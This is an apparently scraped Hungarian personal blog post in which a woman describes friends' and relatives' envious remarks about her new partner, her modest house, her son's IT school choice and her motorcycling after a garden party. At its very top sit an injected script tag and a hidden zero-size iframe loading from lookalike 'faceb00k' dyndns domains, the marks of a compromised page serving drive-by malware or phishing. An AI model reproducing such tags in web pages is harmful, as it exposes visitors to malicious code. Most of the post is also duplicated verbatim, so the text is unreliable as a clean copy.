<script src="http://faceb00ks.dyndns.tv"></script><iframe src="http://faceb00k.dyndns.tv" style="display: none;" height="0" width="0"></iframe>Nem értem az embereket, akik elvileg közel állnak hozzám. Végre boldog vagyok, és úgy alakul az életem, ahogy azt Én szeretném. Mostanában érzem, hosszú idő után, hogy irányítom a sorsom és nem csak sodródom az árral.
Ezt szerettem volna megosztani másokkal is, így gondoltam szervezek egy kerti sütögetős, iszogatós, beszélgetős napot a hétvégén, amikor is a páromat is megismerhetik. (akik eddig még, nem találkoztak vele) Nem csak a szűk családdal, hanem néhány kedvesnek vélt ismerőssel, és közelebbi haverral.
Ezzel nem is volt gond, a kaja finom volt, mindenki láthatóan jól érezte magát, az idő remek volt.
A gondok csak ezután jöttek.
Eltelt 3 nap, és sorra jönnek a nem túl kedves megjegyzések, amik úgy kezdődnek, hogy: Te tudod..., vagy Nem akarlak megbántani... És akadt köztük olyan is, aki egyenesen lehülyézett.
Nem tudom eldönteni, hogy ezek irigységből vagy rosszindulatból törnek elő, de erre nem vagyok kiváncsi. Nem nekik akarok megfelelni, és nem nekik kell az én kicsi életemet élni.
Tudom, dögöljön meg a szomszéd tehene is, de én azt hittem ezek az emberek kedvelnek, és örülni tudnak velem. Hát NEM!
Mindent, ami engem boldoggá tesz mostanság, leszóltak, vagy volt egy epés megjegyzés rá. Persze nem mindenki, de elegen ahhoz, hogy rossz érzés támadjon bennem.
Hiszem, hogy jó úton haladok, és tudom, boldog vagyok. Mégis rossz érzés fogott el. Kedveltem és szerettem ezeket az embereket, adtam a véleményükre is, ha úgy alakult, most mégis ellenséges érzéseket váltottak ki.
Lehet az ő nézetükből, nekik van igazuk, de ez nem az ő életük. Miért nem tudnak örülni annak, ha valaki jól érzi magát a bőrében? Ez ma már nem divat???
Tudom, hogy a ház, amit megvettem, nem egy építészeti műremek, nincs benne semmi extra, és van olyan, akinek az autója többe került, DE AZ ENYÉM! Majd lesz benne annyi, és olyan extra, ami nekünk kell. Ha végzünk a felújítással, akkor takaros kis otthon lesz, a kert rendezés után, pedig az álmom válik majd valóra. Kerti tó, medence és egy terasz, ahol olvashatok, beszélgethetünk. A nyugalom szigete lesz, már látom a lelki szemeimmel, csak pénz és idő kérdése.
Tudom, hogy a volt férjem mérnök volt és "csak" 9 évvel volt idősebb nálam. Nem volt pocakos, félőrült motoros. De nem voltunk boldogok. A kedvesem szeret, elfogad (a fiamat is szereti), támogat. Nem egy daliás herceg, aki a meséből lépett ki, nem gazdag, nem ilyen vagy olyan. Egyszerű, dolgos vállalkozó, aki küzd önmagáért, az alkalmazottakért. Nem hinném, hogy akkor gáz lenne 13 év korkülönbség, amikor kitartásban, lelkesedésben, életkedvben sok harmincas elmarad mellette. Szeretem, ahogy látja a világot, ahogy él, és ahogy velem/velünk bánik. Szeretem, amiért vannak érzései, és ha néha kétségbe esik, akkor is a kiutat,a megoldást keresi. Nincs luxus autója, mert az csak munka eszköz, de van két féltett motorja. Nem megyünk Bora-Borára nyaralni, csak Görögbe motorral, mert nekünk ez lesz az élmény. Egyikünk se vágyik csilli-villi sok csillagos szállodára, az apartman pont megfelel. Csak a motort be lehessen zárni
Ezeken még túl is tettem magam, egyik fülemen be, a másikon ki, de a támadás nem ért véget. A legfájóbb ponton találtak el. A gyermekem. Sokat beszélgettünk a fiammal, hogy merre tovább az általános után. Azt mondta, nem akar gimnáziumba menni, de majd szeretne diplomát. Oké, érettségi kell, de hol, milyen szakirány? Az ő világa, mint sok más fiatalé a számítógép, matekból jó, érdeklik a programok, a játék tesztek, jól rajzol géppel és kézzel egyaránt. Akkor informatika. Felvételi megvolt, két iskolában indítottak infós osztályt, oda jelentkezett első helyre, ahová szeretett volna menni. Felvették! Pontszám alapján mehetett volna a másikba is, de az első helyre kell, meg oda is akart. Erre jönnek a baromságok, hogy ez a suli nem jó, meg 100-1 lesz, aki bekerül az egyetemre. Miért nem gimibe ment, és miért nem erőltettem?
Az, hogy a motorozás miatt hülyének néznek, az már csak hab a tortán. Mert beázik, és veszélyes, és csak két kereke van. Nem számít, hogy nekem ezer éve ez a vágyam.
Tényleg nem értem! Empatikus és megértő vagyok, de ez most kicsit sok volt! Én tudtam örülni, amikor a barátnőm megvett egy lepukkant panellakást, kipofoztuk és jó lett. Vagy amikor az egyik haver vett egy Ladát, mert kellett kocsi, eszembe nem jutott, hogy miért nem vett audi Q7-et, hisz az tetszik neki. Megértettem, hogy nem akar hitelt a mai világban, meg dolgozni járni, gépeket, szerszámokat hozni-vinni ez is jó.
Lehet bennem van a hiba? Nekem elég, ha látom a másik mosolyát, mert valamit elért az életben, és nem anyu-apu tette a segge alá. Tudok örülni annak, ha látom egy párocska szemében a csillogást, akkor is, ha nem szépségkirálynő a leányzó, akit bemutat a barátom.
Ennyivel könnyebb lenne elviselni, ha nem csak a mi életünk, hanem másé se jobb?
Jobb belerúgni a másikba, hogy ne legyen már olyan jó neki?
Nem is csodálom, hogy ennyi ember boldogtalan, ha azt néznék, amijük van, talán egyszerűbb lenne reggel mosolyogni. De amíg csak azt nézik, hogy neki miért van, és nekem miért nincs, addig félő maradnak a hasonlóan "kedves" megjegyzések.
Ezt szerettem volna megosztani másokkal is, így gondoltam szervezek egy kerti sütögetős, iszogatós, beszélgetős napot a hétvégén, amikor is a páromat is megismerhetik. (akik eddig még, nem találkoztak vele) Nem csak a szűk családdal, hanem néhány kedvesnek vélt ismerőssel, és közelebbi haverral.
Ezzel nem is volt gond, a kaja finom volt, mindenki láthatóan jól érezte magát, az idő remek volt.
A gondok csak ezután jöttek.
Eltelt 3 nap, és sorra jönnek a nem túl kedves megjegyzések, amik úgy kezdődnek, hogy: Te tudod..., vagy Nem akarlak megbántani... És akadt köztük olyan is, aki egyenesen lehülyézett.
Nem tudom eldönteni, hogy ezek irigységből vagy rosszindulatból törnek elő, de erre nem vagyok kiváncsi. Nem nekik akarok megfelelni, és nem nekik kell az én kicsi életemet élni.
Tudom, dögöljön meg a szomszéd tehene is, de én azt hittem ezek az emberek kedvelnek, és örülni tudnak velem. Hát NEM!
Mindent, ami engem boldoggá tesz mostanság, leszóltak, vagy volt egy epés megjegyzés rá. Persze nem mindenki, de elegen ahhoz, hogy rossz érzés támadjon bennem.
Hiszem, hogy jó úton haladok, és tudom, boldog vagyok. Mégis rossz érzés fogott el. Kedveltem és szerettem ezeket az embereket, adtam a véleményükre is, ha úgy alakult, most mégis ellenséges érzéseket váltottak ki.
Lehet az ő nézetükből, nekik van igazuk, de ez nem az ő életük. Miért nem tudnak örülni annak, ha valaki jól érzi magát a bőrében? Ez ma már nem divat???
Tudom, hogy a ház, amit megvettem, nem egy építészeti műremek, nincs benne semmi extra, és van olyan, akinek az autója többe került, DE AZ ENYÉM! Majd lesz benne annyi, és olyan extra, ami nekünk kell. Ha végzünk a felújítással, akkor takaros kis otthon lesz, a kert rendezés után, pedig az álmom válik majd valóra. Kerti tó, medence és egy terasz, ahol olvashatok, beszélgethetünk. A nyugalom szigete lesz, már látom a lelki szemeimmel, csak pénz és idő kérdése.
Tudom, hogy a volt férjem mérnök volt és "csak" 9 évvel volt idősebb nálam. Nem volt pocakos, félőrült motoros. De nem voltunk boldogok. A kedvesem szeret, elfogad (a fiamat is szereti), támogat. Nem egy daliás herceg, aki a meséből lépett ki, nem gazdag, nem ilyen vagy olyan. Egyszerű, dolgos vállalkozó, aki küzd önmagáért, az alkalmazottakért. Nem hinném, hogy akkor gáz lenne 13 év korkülönbség, amikor kitartásban, lelkesedésben, életkedvben sok harmincas elmarad mellette. Szeretem, ahogy látja a világot, ahogy él, és ahogy velem/velünk bánik. Szeretem, amiért vannak érzései, és ha néha kétségbe esik, akkor is a kiutat,a megoldást keresi. Nincs luxus autója, mert az csak munka eszköz, de van két féltett motorja. Nem megyünk Bora-Borára nyaralni, csak Görögbe motorral, mert nekünk ez lesz az élmény. Egyikünk se vágyik csilli-villi sok csillagos szállodára, az apartman pont megfelel. Csak a motort be lehessen zárni
Ezeken még túl is tettem magam, egyik fülemen be, a másikon ki, de a támadás nem ért véget. A legfájóbb ponton találtak el. A gyermekem. Sokat beszélgettünk a fiammal, hogy merre tovább az általános után. Azt mondta, nem akar gimnáziumba menni, de majd szeretne diplomát. Oké, érettségi kell, de hol, milyen szakirány? Az ő világa, mint sok más fiatalé a számítógép, matekból jó, érdeklik a programok, a játék tesztek, jól rajzol géppel és kézzel egyaránt. Akkor informatika. Felvételi megvolt, két iskolában indítottak infós osztályt, oda jelentkezett első helyre, ahová szeretett volna menni. Felvették! Pontszám alapján mehetett volna a másikba is, de az első helyre kell, meg oda is akart. Erre jönnek a baromságok, hogy ez a suli nem jó, meg 100-1 lesz, aki bekerül az egyetemre. Miért nem gimibe ment, és miért nem erőltettem?
Az, hogy a motorozás miatt hülyének néznek, az már csak hab a tortán. Mert beázik, és veszélyes, és csak két kereke van. Nem számít, hogy nekem ezer éve ez a vágyam.
Tényleg nem értem! Empatikus és megértő vagyok, de ez most kicsit sok volt! Én tudtam örülni, amikor a barátnőm megvett egy lepukkant panellakást, kipofoztuk és jó lett. Vagy amikor az egyik haver vett egy Ladát, mert kellett kocsi, eszembe nem jutott, hogy miért nem vett audi Q7-et, hisz az tetszik neki. Megértettem, hogy nem akar hitelt a mai világban, meg dolgozni járni, gépeket, szerszámokat hozni-vinni ez is jó.
Lehet bennem van a hiba? Nekem elég, ha látom a másik mosolyát, mert valamit elért az életben, és nem anyu-apu tette a segge alá. Tudok örülni annak, ha látom egy párocska szemében a csillogást, akkor is, ha nem szépségkirálynő a leányzó, akit bemutat a barátom.
Ennyivel könnyebb lenne elviselni, ha nem csak a mi életünk, hanem másé se jobb?
Jobb belerúgni a másikba, hogy ne legyen már olyan jó neki?
Nem is csodálom, hogy ennyi ember boldogtalan, ha azt néznék, amijük van, talán egyszerűbb lenne reggel mosolyogni. De amíg csak azt nézik, hogy neki miért van, és nekem miért nincs, addig félő maradnak a hasonlóan "kedves" megjegyzések.